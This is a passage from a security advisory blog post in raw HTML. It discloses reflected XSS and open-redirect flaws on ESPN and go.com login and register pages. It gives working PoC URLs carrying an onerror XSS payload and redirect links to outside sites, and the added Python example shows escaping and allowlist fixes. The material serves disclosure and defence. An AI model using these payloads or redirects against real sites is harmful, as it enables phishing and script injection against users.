<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=espn" target="_blank">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2F%<wbr></wbr>2Fr.espn.go.com%2Fgame%<wbr></wbr>3Famazon%3Dcreate%2Fmembers%<wbr></wbr>2FmodifyNewsletters%<wbr></wbr>3FpageName%<wbr></wbr>3DESPNNewsletterPage&language=<wbr></wbr>en&affiliateName=espn&<wbr></wbr>regFormId=espn</a>&quot;&gt;&lt;img src=x onerror=prompt('justqdjing')&gt;</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate" target="_blank">http://games.espn.go.com/nfl-<wbr></wbr>gridiron-challenge/2014/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fgames.espn.go.com%2Fnfl-<wbr></wbr>gridiron-challenge%2Febay2014%<wbr></wbr>2Ffacebookesgame%3Fstep%<wbr></wbr>3Dcreate</a>&quot;&gt;&lt;img src=x onerror=prompt('justqdjing')&gt;</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login" target="_blank">https://register.go.com/go/<wbr></wbr>sendMemberNames?aff_code=go&<wbr></wbr>appRedirect=http://register.<wbr></wbr>go.com/disney/ebay/<wbr></wbr>GuestServices/YourAccount/<wbr></wbr>login</a>&quot;&gt;&lt;img src=x onerror=prompt('justqdjing')&gt;</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Poc Video:</span></b></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be</a></span></div>
</div>
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii32-o77MUXaB7y2RlsNeatmSHvXvfNvzxhRgPs5GCKtRNSO_AvBktXPVXUh3gFNSFYYH0-g9VUQckQ1o8XHqDIMdFiOX7Gd5hwLkhWAD4qn_uq2iBcwXmgSI0fg9QLHQOd6_qHBSyPTE/s1600/espn_go_r_xss2.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii32-o77MUXaB7y2RlsNeatmSHvXvfNvzxhRgPs5GCKtRNSO_AvBktXPVXUh3gFNSFYYH0-g9VUQckQ1o8XHqDIMdFiOX7Gd5hwLkhWAD4qn_uq2iBcwXmgSI0fg9QLHQOd6_qHBSyPTE/s1600/espn_go_r_xss2.png" style="cursor: move;" width="400" /></span></a></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT3vrnmIqYBqFbrPgSeUNJqMEX-bpIfP5_vvsMZpmAD8X2VhrDPoz3UGpBetNmaI-iXY_4xzeETEVoA6Bf0OiAehdpXzYJYLUuOrE25jT09nJGgzNZrn0CAsbHqFC6A34cPF_dsAlTJFg/s1600/espn_go_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT3vrnmIqYBqFbrPgSeUNJqMEX-bpIfP5_vvsMZpmAD8X2VhrDPoz3UGpBetNmaI-iXY_4xzeETEVoA6Bf0OiAehdpXzYJYLUuOrE25jT09nJGgzNZrn0CAsbHqFC6A34cPF_dsAlTJFg/s1600/espn_go_xss.png" style="cursor: move;" width="400" /></span></a></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8hBYu2QGWy9qMYcDMe0jjiHi-hYCHxIXPFAcypxZmYV9iNezkbzERVhCx7M36lv61Zz8xN2qaL2IqPwKcqME9g9hdgGfaXNrtDbeL5tQjWHS7jQ9xuYwXJU1_ITz4uSEOh879n3dlmG8/s1600/espn_register_xss1.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8hBYu2QGWy9qMYcDMe0jjiHi-hYCHxIXPFAcypxZmYV9iNezkbzERVhCx7M36lv61Zz8xN2qaL2IqPwKcqME9g9hdgGfaXNrtDbeL5tQjWHS7jQ9xuYwXJU1_ITz4uSEOh879n3dlmG8/s1600/espn_register_xss1.png" style="cursor: move;" width="400" /></span></a></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Dest Redirect Privilege Escalation Web Security Vulnerability</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">From OWASP: an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. It could allow an attacker to create a specially crafted URL that, if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are effective because the crafted URL initially appears to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client-side software such as a web browser or document rendering programs.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
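<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The XSS in section (1) and the open redirect in section (2) sit on the same <code>redirect</code> / <code>appRedirect</code> parameter, so the following Python, added here as an example and not ESPN's or the advisory author's code, shows the two server-side defences that parameter needs: attribute-context escaping wherever the value is reflected into HTML, and an allowlist check before the application ever follows it. The ALLOWED_HOSTS set (the hostnames named above), the hidden-field markup, the query strings and the evil.example inputs are constructed for the demonstration.</span></div>

```python
"""Defensive handling of a login page's redirect parameter.

Added example, not ESPN's or the advisory author's code. It shows the two
server-side fixes the advisory's sections (1) and (2) motivate for the same
``redirect`` / ``appRedirect`` parameter: escape the value when it is
reflected into HTML, and check it against an allowlist before following it.
"""
import html
import string
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist for the demonstration: the hostnames named in the advisory.
ALLOWED_HOSTS = frozenset({"streak.espn.go.com", "r.espn.go.com", "games.espn.go.com"})

# Characters RFC 3986 permits in a URL (unreserved + reserved + percent).
# Quotes, angle brackets, spaces, backslashes and control characters are not
# among them, so a value carrying markup fails the check immediately.
_URL_CHARS = frozenset(string.ascii_letters + string.digits + "-._~:/?#[]@!$&'()*+,;=%")

# Payload shape from the advisory's POC URLs: closes the attribute, opens a tag.
POC_SUFFIX = "\"><img src=x onerror=prompt('justqdjing')>"


def redirect_from_query(query_string, names=("redirect", "appRedirect")):
    """Return the first redirect-style parameter in a raw query string, decoded once."""
    params = parse_qs(query_string, keep_blank_values=True)
    for name in names:
        if name in params:
            return params[name][0]
    return None


def render_hidden_field_vulnerable(redirect):
    # Vulnerable pattern: raw concatenation into an attribute value, so a
    # double quote in the parameter ends the attribute and new markup follows.
    return '<input type="hidden" name="redirect" value="' + redirect + '">'


def render_hidden_field_safe(redirect):
    # Hardened: attribute-context escaping. quote=True turns " and ' into
    # entities as well as &, < and >, so the value cannot leave the attribute.
    return '<input type="hidden" name="redirect" value="%s">' % html.escape(redirect, quote=True)


def safe_redirect_target(value, allowed_hosts=ALLOWED_HOSTS, default="/"):
    """Return ``value`` if it is a safe redirect target, otherwise ``default``.

    Accepted: an absolute path on this site ("/en/...") or an http(s) URL whose
    host is in ``allowed_hosts`` and which carries no userinfo. Everything else
    (foreign hosts, scheme-relative "//host", non-http schemes, embedded markup)
    falls back to ``default``.
    """
    if not value or any(ch not in _URL_CHARS for ch in value):
        return default
    try:
        parts = urlsplit(value)
    except ValueError:                      # e.g. an unbalanced IPv6 bracket
        return default
    if not parts.scheme and not parts.netloc:
        # Same-site relative target: must be a single-slash absolute path.
        # "///host" is rejected because browsers collapse it to "http://host".
        return value if value.startswith("/") and not value.startswith("//") else default
    if parts.scheme.lower() not in ("http", "https"):
        return default                      # javascript:, data:, etc.
    if parts.username is not None or parts.password is not None:
        return default                      # https://trusted@evil.example/
    if (parts.hostname or "").lower() not in allowed_hosts:
        return default                      # also catches "//host" and "http:/host"
    return value


if __name__ == "__main__":
    # Constructed query strings in the shape the advisory's URLs use.
    for query in ("redirect=%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459",
                  "appRedirect=http%3A%2f%2fdiebiyi.com",
                  "appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial",
                  "redirect=%2F%2Fevil.example%2F",
                  "redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2F" + POC_SUFFIX):
        raw = redirect_from_query(query)
        print("%-75s -> %s" % (raw, safe_redirect_target(raw)))
    print(render_hidden_field_vulnerable("/en/" + POC_SUFFIX))
    print(render_hidden_field_safe("/en/" + POC_SUFFIX))
```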
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">One webpage is used as the redirect target for the following tests. Its address is "<a href="https://computerpitch.wordpress.com/">https://computerpitch.wordpress.com/</a>". Suppose that this webpage is malicious.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be exploited without user login. Tests were performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox (34.0) and Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) Login Page Dest Redirect Privilege Escalation Vulnerability</b></span></div>
<div style="margin: 0px;">
<b style="background-color: transparent;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%<wbr></wbr>2FAndroidOfficial</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2f%<wbr></wbr>2fdiebiyi.com</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2F101882723190828" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2.2) Vulnerabilities Attacked without User Login</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Fstatus%2Febay%2Falibaba%2F539770783556698112" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com" target="_blank">http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">This vulnerability was used to demonstrate "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" of Facebook.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">PoC Video:</span></b></div>
